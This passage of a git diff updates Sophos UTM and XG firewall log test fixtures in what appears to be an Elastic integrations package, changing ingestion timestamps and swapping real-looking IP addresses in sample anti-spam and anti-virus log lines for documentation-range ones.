\"tuserror\"] [id \"utlabo\"] [rev \"scip\"] [msg \"imvenia\"] [severity \"low\"] [ver \"1.6420\"] [maturity \"nisi\"] [accuracy \"seq\"] [tag \"ors\"] [hostname \"olupta3647.host\"] [uri \"uaUteni\"] [unique_id \"gitsedqu\"]amqu", "event": { - "ingested": "2021-10-26T10:41:54.239052256Z" + "ingested": "2021-12-09T13:44:53.094200300Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "2018:5:21-13:41:41 named[6633]: FORMERR resolving 'iavolu7814.www5.localhost': 10.194.12.83#elit", "event": { - "ingested": "2021-10-26T10:41:54.239053610Z" + "ingested": "2021-12-09T13:44:53.094206Z" }, "tags": [ "preserve_original_event" @@ -726,7 +726,7 @@ }, "message": "2018:6:4-20:44:15 astarosg_TVM[5792]: id=elitess severity=low sys=amqua sub=mavenia name=checking if admin is enabledaction=cancel method=doc client=teurs facility=eturadi user=eturadip srcip=10.33.138.154 dstip=10.254.28.41 version=1.4256 storage=volupta ad_domain=dolor object=dolorsit class=tfugits type=lor attributes=oremcount=utper node=ueips account=umqustatuscode=ntexpli cached=siuta profile=porincid filteraction=itame size=1026 request=fugiat url=https://www5.example.org/etcons/aecatc.jpg?ditem=tut#oditautf referer=https://internal.example.org/eddoei/iatqu.htm?itessec=dat#tdol error=emul authtime=ariatu dnstime=luptate cattime=umdolore avscantime=iutaliq fullreqtime=oriosamn device=oluptate auth=tcu ua=mmodo exceptions=rauto group=lup category=orem categoryname=tutl content-type=iusmo reputation=uiavolu application=eri app-id=pis reason=riosam filename=isa file=nonnum extension=Nemoenim time=itati function=cancel line=nes message=atvolupt fwrule=umwritt seq=uae initf=enp0s3792 outitf=lo2114 dstmac=01:00:5e:24:b8:9f srcmac=01:00:5e:a1:a3:9f proto=bil length=itten tos=icer prec=;dolo ttl=siutaliq srcport=1455 dstport=6937 tcpflags=pexeaco info=ercitati prec=dexea caller=tasnul engine=onu localip=orisnisi host=obea2960.mail.corp extra=dolor server=10.45.12.53 cookie=etdo set-cookie=edictas", "event": { - "ingested": "2021-10-26T10:41:54.239055031Z" + "ingested": "2021-12-09T13:44:53.094211800Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "2018:6:19-03:46:49 frox[7744]: Listening on 10.99.134.49:2274", "event": { - "ingested": "2021-10-26T10:41:54.239056456Z" + "ingested": "2021-12-09T13:44:53.094217Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "2018:7:3-10:49:23 olli5982.www.test reverseproxy: [asp] [uatDui:medium] [pid 212:unde] [client raut] [suscip] virus daemon error found in request ectetu, referer: https://example.com/ariat/ptatemU.txt?cusan=ueipsaq#upid", "event": { - "ingested": "2021-10-26T10:41:54.239057849Z" + "ingested": "2021-12-09T13:44:53.094221900Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "2018:7:17-17:51:58 nsecte3644.internal.test reverseproxy: [tutla] [isund:high] [pid 3136:uidex] [client uptate] Invalid signature, cookie: JSESSIONID", "event": { - "ingested": "2021-10-26T10:41:54.239059219Z" + "ingested": "2021-12-09T13:44:53.094227600Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "2018:8:1-00:54:32 confd[4157]: id=onseq severity=very-high sys=siutaliq sub=aliqu name=serro client=ctet facility=umiurere user=antium srcip=10.32.85.21 version=1.7852 storage=eaco object=onp class=ectetur type=ione attributes=utlaborecount=nci node=acommodi account=etconsec", "event": { - "ingested": "2021-10-26T10:41:54.239060590Z" + "ingested": "2021-12-09T13:44:53.094233400Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "2018:8:15-07:57:06 econseq7119.www.home sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-10-26T10:41:54.239061978Z" + "ingested": "2021-12-09T13:44:53.094237700Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "2018:8:29-14:59:40 ant2543.www5.lan reverseproxy: [uaturve] [lapa:high] [pid 3669:idu] [client sed] [utem] cannot read reply: Operation now in progress (115), referer: https://example.com/oremagn/ehenderi.htm?mdolo=ionul#oeiusmo", "event": { - "ingested": "2021-10-26T10:41:54.239063358Z" + "ingested": "2021-12-09T13:44:53.094242400Z" }, "tags": [ "preserve_original_event" @@ -810,7 +810,7 @@ }, "message": "2018:9:12-22:02:15 pluto[7138]: | sent accept notification olore with seqno = urEx", "event": { - "ingested": "2021-10-26T10:41:54.239064738Z" + "ingested": "2021-12-09T13:44:53.094248100Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "2018:9:27-05:04:49 httpd[6562]: id=iurere severity=medium sys=erc sub=atu name=http accessaction=accept method=odte client=uis facility=sedquia user=reetd srcip=10.210.175.52 dstip=10.87.14.186 version=1.7641 storage=tasu ad_domain=mquae object=CSedu class=atae type=aeconseq attributes=boNemocount=duntutla node=mqu account=inimastatuscode=emipsum cached=venia profile=Loremi filteraction=uisnostr size=849 request=vol url=https://internal.example.com/ritat/dipi.jpg?aliquide=aliqui#agnaaliq referer=https://api.example.org/Bonorume/emeumfu.txt?iuntNequ=ender#quid error=mipsa authtime=teturad dnstime=nimide cattime=spernat avscantime=nevolu fullreqtime=itectobe device=rroq auth=itessequ ua=uunt exceptions=pic group=unt category=emUt categoryname=eiru content-type=sauteir reputation=pic application=caecatc app-id=iarc reason=emquia filename=duntutl file=idi extension=reetdo time=pidatatn function=cancel line=ncul message=mcorpor fwrule=ofd seq=lapariat initf=eth65 outitf=lo3615 dstmac=01:00:5e:b3:e3:90 srcmac=01:00:5e:0e:b3:8e proto=consequ length=min tos=riame prec=;gnaal ttl=nti srcport=1125 dstport=605 tcpflags=utlab info=colabo prec=ditem caller=did engine=BCS localip=idex host=nisiuta4810.api.test extra=apa server=10.85.200.58 cookie=esse set-cookie=idexeac port=2294 query=iatquovo uid=rExce", "event": { - "ingested": "2021-10-26T10:41:54.239066188Z" + "ingested": "2021-12-09T13:44:53.094253200Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "2018:10:11-12:07:23 itametc1599.api.test ulogd: id=itaedi severity=low sys=ore sub=ips name=Authentication successful action=block fwrule=iamqu seq=aboN initf=eth2679 outitf=enp0s1164 dstmac=01:00:5e:c3:8a:24 srcmac=01:00:5e:5a:9d:a9 srcip=10.133.45.45 dstip=10.115.166.48 proto=utaliq length=icer tos=essequ prec=oeiu ttl=nsequa srcport=4180 dstport=4884 tcpflags=squa info=etM code=eve type=iru", "event": { - "ingested": "2021-10-26T10:41:54.239067650Z" + "ingested": "2021-12-09T13:44:53.094257300Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "2018:10:25-19:09:57 tiumt5462.mail.localhost sshd: Invalid user admin from runt", "event": { - "ingested": "2021-10-26T10:41:54.239069067Z" + "ingested": "2021-12-09T13:44:53.094261800Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "2018:11:9-02:12:32 vol1450.internal.host sshd: Server listening on 10.71.184.162 port 3506.", "event": { - "ingested": "2021-10-26T10:41:54.239070438Z" + "ingested": "2021-12-09T13:44:53.094266500Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "2018:11:23-09:15:06 ipsec_starter[178]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-10-26T10:41:54.239071873Z" + "ingested": "2021-12-09T13:44:53.094271400Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "2018:12:7-16:17:40 rporissu573.api.test reverseproxy: [exercita] [emaperi:very-high] [pid 5943:ddoei] AH02312: Fatal error initialising mod_ssl, nihi.", "event": { - "ingested": "2021-10-26T10:41:54.239073252Z" + "ingested": "2021-12-09T13:44:53.094277Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "2018:12:21-23:20:14 nostru774.corp URID: T=tatnonp ------ 1 - [exit] allow: natuserr", "event": { - "ingested": "2021-10-26T10:41:54.239074738Z" + "ingested": "2021-12-09T13:44:53.094283100Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "2019:1:5-06:22:49 ipsec_starter[6226]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-10-26T10:41:54.239076149Z" + "ingested": "2021-12-09T13:44:53.094288900Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "2019:1:19-13:25:23 httpd[5037]: [iadese:unknown] [pid isundeo:emq] [client rehender] ModSecurity: Warning. uat [file \"apa\"] [line \"tani\"] [id \"per\"] [rev \"ngelitse\"] [msg \"olorsita\"] [severity \"medium\"] [ver \"1.7102\"] [maturity \"apariat\"] [accuracy \"iuntNequ\"] [tag \"rExc\"] [hostname \"lorsita2216.www5.example\"] [uri \"turvelil\"] [unique_id \"velitsed\"]rau", "event": { - "ingested": "2021-10-26T10:41:54.239077572Z" + "ingested": "2021-12-09T13:44:53.094294500Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "2019:2:2-20:27:57 sum2208.host reverseproxy: [eir] [nia:medium] [pid 4346:mco] [client ritinvol] [quioffi] mod_avscan_check_file_single_part() called with parameter filename=quamquae", "event": { - "ingested": "2021-10-26T10:41:54.239079008Z" + "ingested": "2021-12-09T13:44:53.094300200Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "2019:2:17-03:30:32 ore6843.local reverseproxy: [usmodite] [aveniam:medium] [pid 5126:xplicab] [client taev] No signature found, cookie: dictasu", "event": { - "ingested": "2021-10-26T10:41:54.239080402Z" + "ingested": "2021-12-09T13:44:53.094305900Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "2019:3:3-10:33:06 Sedu1610.mail.corp reverseproxy: [audant] [porr:medium] [pid 7442:tation] [client uunturma] AH01114: cons: failed to make connection to backend: 10.177.35.133", "event": { - "ingested": "2021-10-26T10:41:54.239081733Z" + "ingested": "2021-12-09T13:44:53.094311700Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "2019:3:17-17:35:40 corpo6737.example reverseproxy: [officiad] [aliquide:very-high] [pid 6600:errorsi] [client raincidu] [orincidi] cannot connect: failure (111)", "event": { - "ingested": "2021-10-26T10:41:54.239083085Z" + "ingested": "2021-12-09T13:44:53.094319Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "2019:4:1-00:38:14 pop3proxy[6854]: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239084487Z" + "ingested": "2021-12-09T13:44:53.094324900Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "2019:4:15-07:40:49 eratvol314.www.home pop3proxy: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239085935Z" + "ingested": "2021-12-09T13:44:53.094330700Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "2019:4:29-14:43:23 utemvele1838.mail.test reverseproxy: [xplicabo] [aco:high] [pid 2389:ratione] [client nrepr] ModSecurity: Warning. uipex [file \"alorumw\"] [line \"nibus\"] [id \"eiusmo\"] [msg \"rci\"] [hostname \"seosquir715.local\"] [uri \"ercitati\"] [unique_id \"uiration\"]", "event": { - "ingested": "2021-10-26T10:41:54.239087286Z" + "ingested": "2021-12-09T13:44:53.094336500Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "2019:5:13-21:45:57 ulapari2656.local reverseproxy: [itessec] [non:very-high] [pid 2237:licaboN] [client nvol] [moenimip] cannot connect: failure (111)", "event": { - "ingested": "2021-10-26T10:41:54.239088679Z" + "ingested": "2021-12-09T13:44:53.094342200Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "2019:5:28-04:48:31 reverseproxy[4278]: [ritat] [iscinge:very-high] [pid 4264:rroquisq] [client tnonpro] [nimv] erunt while reading reply from cssd, referer: https://example.org/etcon/ipitlab.gif?utlabore=suscipi#tlabor", "event": { - "ingested": "2021-10-26T10:41:54.239117653Z" + "ingested": "2021-12-09T13:44:53.094347900Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "2019:6:11-11:51:06 URID[7418]: T=xer ------ 1 - [exit] cancel: onemul", "event": { - "ingested": "2021-10-26T10:41:54.239120712Z" + "ingested": "2021-12-09T13:44:53.094353500Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "2019:6:25-18:53:40 pluto[7201]: | handling event ips for 10.165.217.56 \"econse\" #otamr", "event": { - "ingested": "2021-10-26T10:41:54.239122376Z" + "ingested": "2021-12-09T13:44:53.094359200Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "2019:7:10-01:56:14 stla2856.host reverseproxy: [onpro] [adolo:very-high] [pid 7766:siste] ModSecurity for Apache/nisiut (ostr) configured.", "event": { - "ingested": "2021-10-26T10:41:54.239123879Z" + "ingested": "2021-12-09T13:44:53.094364900Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "2019:7:24-08:58:48 peri6748.www5.domain reverseproxy: [cingeli] [esseq:high] [pid 2404:aquae] AH00098: pid file otamrema overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-10-26T10:41:54.239125287Z" + "ingested": "2021-12-09T13:44:53.094370600Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "2019:8:7-16:01:23 tnon5442.internal.test reverseproxy: [ive] [tquido:very-high] [pid 6108:taliquip] AH00295: caught accept, ectetu", "event": { - "ingested": "2021-10-26T10:41:54.239126679Z" + "ingested": "2021-12-09T13:44:53.094376300Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "2019:8:21-23:03:57 ariatu2606.www.host reverseproxy: [quamestq] [umquid:very-high] [pid 7690:rem] [client its] [inv] not all the file sent to the client: rin, referer: https://example.org/tation/tutlabo.jpg?amvo=ullamco#tati", "event": { - "ingested": "2021-10-26T10:41:54.239128073Z" + "ingested": "2021-12-09T13:44:53.094382100Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "2019:9:5-06:06:31 imv1805.api.host ulogd: id=oenim severity=very-high sys=iaturExc sub=orsit name=ICMP flood detected action=cancel fwrule=eos seq=quameius initf=lo4665 outitf=lo3422 dstmac=01:00:5e:d6:f3:bc srcmac=01:00:5e:87:02:08 srcip=10.96.243.231 dstip=10.248.62.55 proto=ugiat length=quiin tos=apar prec=eleumiur ttl=chite srcport=5632 dstport=4206 tcpflags=tevelit info=etc code=lorem type=temvele", "event": { - "ingested": "2021-10-26T10:41:54.239129424Z" + "ingested": "2021-12-09T13:44:53.094387900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "2019:9:19-13:09:05 rita600.www5.localdomain reverseproxy: [ini] [elite:high] [pid 7650:mnisiut] AH00959: ap_proxy_connect_backend disabling worker for (10.132.101.158) for cipitlabs", "event": { - "ingested": "2021-10-26T10:41:54.239130807Z" + "ingested": "2021-12-09T13:44:53.094393600Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "2019:10:3-20:11:40 sshd[2014]: Did not receive identification string from rroq", "event": { - "ingested": "2021-10-26T10:41:54.239132267Z" + "ingested": "2021-12-09T13:44:53.094399300Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "2019:10:18-03:14:14 admini1122.www.local reverseproxy: [ritte] [umwritte:very-high] [pid 1817:atu] (13)failure: [client vol] AH01095: prefetch request body failed to 10.96.193.132:5342 (orumwr) from bori ()", "event": { - "ingested": "2021-10-26T10:41:54.239133668Z" + "ingested": "2021-12-09T13:44:53.094405Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "2019:11:1-10:16:48 confd[2475]: id=utaliqu severity=low sys=xplicabo sub=quamni name=dol client=sisten facility=remeumf user=acommod srcip=10.96.200.83 version=1.7416 storage=sper object=asia class=roident type=olorem attributes=teursintcount=evelites node=nostr account=lapariat", "event": { - "ingested": "2021-10-26T10:41:54.239135048Z" + "ingested": "2021-12-09T13:44:53.094410800Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "2019:11:15-17:19:22 emvel4391.localhost sshd: Did not receive identification string from quelaud", "event": { - "ingested": "2021-10-26T10:41:54.239136442Z" + "ingested": "2021-12-09T13:44:53.094416500Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "2019:11:30-00:21:57 confd-sync[5454]: id=smodite severity=high sys=utpersp sub=rnatu name=ico", "event": { - "ingested": "2021-10-26T10:41:54.239137882Z" + "ingested": "2021-12-09T13:44:53.094422200Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "2019:12:14-07:24:31 untinc5531.www5.test sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-10-26T10:41:54.239139272Z" + "ingested": "2021-12-09T13:44:53.094427800Z" }, "tags": [ "preserve_original_event" diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log index 945ece7204b..4fff1a3b93c 100644 --- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log +++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log @@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" +<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP" @@ -9,39 +9,39 @@ <30>device="SFW" date=2018-06-06 time=12:53:39 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041123413012 log_type="Anti-Spam" log_component="SMTP" log_subtype="Dos" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="" to_email_address="" email_subject="" mailid="" mailsize=0 spamaction="TMPREJECT" reason="SMTP DoS" src_domainname="" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=12:56:53 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041102413014 log_type="Anti-Spam" log_component="SMTP" log_subtype="Denied" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil1@postman.local" to_email_address="pankhil@postman. local" email_subject="Fwd: test sand" mailid="c0000008-1528270010" mailsize=419835 spamaction="DROP" reason="Email is marked Malicious by Sophos Sandstorm." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2017-01-31 time=18:31:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041207414001 log_type="Anti-Spam" log_component="POP3" log_subtype="Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="GauravPatel" from_email_address="gaurav1@iview.com" to_email_address="gaurav2@iview. com" email_subject="RPD Spam Test: Spam" mailid="<2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com>" mailsize=574 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="iview.com" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57835 